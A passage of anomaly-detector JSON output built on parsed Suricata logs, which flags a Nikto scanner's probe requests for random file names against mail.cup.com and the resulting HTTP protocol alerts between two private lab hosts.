"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cfg\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cfg\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cfg", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cfg", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46800, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1239879732876050,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1239879732876050, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.186581+0000\",\"flow_id\":1239879732876050,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.188797 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46802 -> 192.168.10.154:80", "/parser/model/time": 1583349514.188797, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46802, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.188797 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46802 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso8859-2", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.189008+0000\",\"flow_id\":964576624172563,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.189008, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":964576624172563,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso8859-2\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso8859-2\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso8859-2", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso8859-2", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46802, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":964576624172563,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 964576624172563, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.189008+0000\",\"flow_id\":964576624172563,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.192062 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46804 -> 192.168.10.154:80", "/parser/model/time": 1583349514.192062, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46804, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.192062 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46804 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.php3+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.192275+0000\",\"flow_id\":1233325612787490,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.192275, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1233325612787490,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.php3+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.php3+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.php3+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.php3+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46804, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1233325612787490,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1233325612787490, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.192275+0000\",\"flow_id\":1233325612787490,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.194298 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46806 -> 192.168.10.154:80", "/parser/model/time": 1583349514.194298, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46806, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.194298 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46806 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 